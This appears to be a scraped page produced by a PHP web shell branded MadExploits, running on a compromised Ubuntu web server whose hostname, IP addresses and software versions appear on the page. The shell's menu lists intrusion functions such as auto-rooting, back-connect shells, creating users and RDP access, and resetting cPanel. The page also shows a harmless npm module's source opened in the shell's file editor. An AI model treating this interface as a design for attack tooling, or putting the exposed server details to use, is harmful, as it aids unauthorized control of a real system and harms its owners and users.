Linux web-conference.aiou.edu.pk 5.4.0-205-generic #225-Ubuntu SMP Fri Jan 10 22:23:35 UTC 2025 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.17.177.248
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
javascript /
typedarray-to-buffer /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1.08
KB
-rw-r--r--
index.min.js
439
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
/** * Convert a typed array to a Buffer without a copy * * Author: Feross Aboukhadijeh <feross@feross.org> <http://feross.org> * License: MIT * * `npm install typedarray-to-buffer` */ var isTypedArray = require('is-typedarray').strict module.exports = function (arr) { // If `Buffer` is the browser `buffer` module, and the browser supports typed arrays, // then avoid a copy. Otherwise, create a `Buffer` with a copy. var constructor = Buffer.TYPED_ARRAY_SUPPORT ? Buffer._augment : function (arr) { return new Buffer(arr) } if (arr instanceof Uint8Array) { return constructor(arr) } else if (arr instanceof ArrayBuffer) { return constructor(new Uint8Array(arr)) } else if (isTypedArray(arr)) { // Use the typed array's underlying ArrayBuffer to back new Buffer. This respects // the "view" on the ArrayBuffer, i.e. byteOffset and byteLength. No copy. return constructor(new Uint8Array(arr.buffer, arr.byteOffset, arr.byteLength)) } else { // Unsupported type, just pass it through to the `Buffer` constructor. return new Buffer(arr) } }
Close